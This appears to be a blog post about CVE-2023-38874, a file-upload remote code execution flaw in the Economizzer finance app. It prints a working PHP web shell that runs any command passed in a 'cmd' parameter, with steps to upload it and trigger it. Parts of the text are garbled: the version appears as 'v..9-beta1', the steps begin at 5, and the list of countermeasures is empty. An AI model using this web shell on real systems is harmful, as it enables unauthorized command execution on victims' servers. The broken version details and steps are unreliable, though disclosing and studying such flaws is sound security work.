CVE-2023-38874 - Remote Code Execution Vulnerability in Gugoan's Economizzer v..9-beta1 and Commit 373088

Hello readers, today we will discuss a critical vulnerability (CVE-2023-38874) affecting Gugoan's Economizzer, a popular open-source personal finance manager. This Remote Code Execution (RCE) vulnerability is present in version .9-beta1 and commit 373088 (April 2023). In this post, we will go over the technical details of this vulnerability, how the exploit works, and references to the original sources.

Vulnerability Details

The CVE-2023-38874 vulnerability allows malicious attackers to execute arbitrary code on a target system by abusing an insecure file upload mechanism within the Economizzer application. Specifically, an attacker can upload a PHP web shell as an attachment when adding a new cash book entry. Once the web shell is uploaded, the attacker can visit it via a web browser and run arbitrary commands on the affected system.

Here's a code snippet demonstrating the exploitation of this vulnerability

<?php
// PHP web shell for Economizzer RCE (CVE-2023-38874)

if(isset($_REQUEST['cmd'])) {
    echo '<pre>';
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo '</pre>';
    die;
}
?>

Submit the new cash book entry.

5. Visit the uploaded web shell by navigating to its URL. For example: http://target.com/uploads/webshell.php
6. Append the cmd parameter and issue any command you wish to execute, e.g., http://target.com/uploads/webshell.php?cmd=whoami

Please note: the above example is for educational purposes only. Unauthorized access to computer systems is illegal, and you should only test this exploit on systems you own or have permission to access.

Mitigation and Remediation

To address this vulnerability, the developers of Economizzer should implement proper validation checks when handling file uploads. Specifically, the application should validate the file types, restrict file extensions to a whitelist of allowed types, and avoid storing uploaded files in publicly accessible directories.

If you are using an affected version of Economizzer, consider updating your instance to a patched version as soon as it becomes available. Until then, some temporary countermeasures you can implement include:

Here are some relevant links to learn more about this vulnerability

- Gugoan's Economizzer GitHub Repository
- CVE-2023-38874 - NIST National Vulnerability Database (NVD) Entry

In conclusion, the CVE-2023-38874 vulnerability presents a serious security risk for users of Gugoan's Economizzer application. By documenting and discussing this vulnerability, it is our hope that developers and users alike will adopt best practices in handling file uploads and take appropriate steps to protect their systems from potential exploitation.

Timeline

Published on: 09/28/2023 04:15:12 UTC
Last modified on: 10/02/2023 18:35:07 UTC